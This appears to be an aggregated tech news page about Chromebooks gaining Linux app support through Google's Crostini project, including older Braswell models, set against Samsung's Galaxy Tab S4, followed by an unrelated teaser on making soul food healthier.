    Samsung recently presented the Galaxy Tab S4 as the ultimate productivity portable device but initial reviews have been rather scathing. Thanks to its timing, Samsung’s premium tablet is being compared to the likes of the cheaper iPad, the cheaper Surface Go, and, closer to home, Chromebooks. The latter, especially, is getting more and more talented and the latest experimental feature nearly turns it into that ultimate productivity OS. That is if you live and breathe Linux.

  • Linux Apps Coming To Older Braswell Chromebooks

    The addition of Linux apps to Chrome OS via the Crostini Project seems to be expanding at an exponential rate lately. Google has been content not sharing any insight into the project apart from the advantages it brings to developers but the latest update points at a larger target than just techies developing software.

    According to the commit, a decent number of Braswell-powered Chromebooks will soon be getting Linux app support.


          How To Make Soul Food A Healthier Choice
In a recent sketch on SNL, two hosts of a gospel-themed cooking show cooked soul food while talking about people they know dying from heart disease and diabetes. It might come across as funny, but it holds a kernel of truth about soul food and its link to health issues. Soul food – it’s the food of […]

